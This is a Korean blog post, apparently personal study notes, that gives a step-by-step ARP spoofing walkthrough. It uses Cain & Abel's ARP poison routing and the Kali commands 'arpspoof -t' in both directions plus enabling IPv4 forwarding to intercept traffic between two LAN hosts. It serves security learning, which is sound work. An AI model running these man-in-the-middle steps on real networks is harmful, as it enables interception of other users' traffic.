딩굴댕굴

네트워크 해킹 - 04. ARP Spoofing

by jennysgap

BOX

Spoofing

1. MAC Spoofing

2. IP Spoofing (외부 시스템 공격, Dos)

3. TCP Sequence Guess (hijacking) : 공격이 안 될 확률이 높음

4. App (DNS) Spoofing 


ARP spoofing

카인과 아벨 다운로드  →  http://www.oxid.it/cain.html

ARP Spoofing은 근거리 통신망(LAN) 하에서 주소 결정 프로토콜(ARP) 메시지를 이용하여 
상대방의 데이터 패킷을 중간에서 가로채는 중간자 공격 기법이다. (같은 네트워크망 안에서 이뤄짐)


Cain & abel 

Cain & abel 실행  →    클릭


스니핑 창 클릭


'+' 클릭하거  or  마우스 오른쪽클릭  →  'Scan MAC Addresses' 클릭


Scan할 MAC Address 범위 설정  →  OK 클릭


같은 네트워크망에 연결된 기기들이 스캔됨


스캔이 끝났다면 ARP 창 클릭


' + ' 클릭  →  New ARP Poison Routing 창 확인


왼쪽에는 상대방_IP, 오른쪽에는 공유기 Gateway_IP 설정 (보통 끝에 .1로 끝남)


'start/stop ARP 클릭' 으로 스푸핑 시작!


Kali Linux - arp spoofing

Man In The Middle
B(pc)     C(pc)
kali: ping, arp (1)          kali: ping, arp (2)
    A(해커pc)

kali : ip_forward = 1
(1) arpspoof -t IP_b IP_c
(2) arpspoof -t IP_c IP_b
* 공격을 당하기 전 B 와 C는 연결되어있어야 함


<공격자>

# arpspoof -t 속일대상IP 속이고자하는IP         (1번 명령창)

# arpspoof -t 10.10.0.x    10.10.0.xx

# arpspoof -t 속일대상IP 속이고자하는IP         (2번 명령창)

# arpspoof -t 10.10.0.xx   10.10.0.x

# echo 1 > /proc/sys/net/ipv4/ip_forward 커널드라이브 파일임(열어서 보면 안됨! - 수정 오류시 파일 깨짐)

# cat /proc/sys/net/ipv4/ip_forward


<피해자>

# arp -a



<공격자> arpspoof -t 192.168.3.46 192.168.3.1


<공격자> echo 1 > /proc/sys/net/ipv4/ip_forward


<피해자> arp -a





참고

• ARP 스푸핑 위키백과사전

반응형

블로그의 정보

jennysgap

jennysgap

활동하기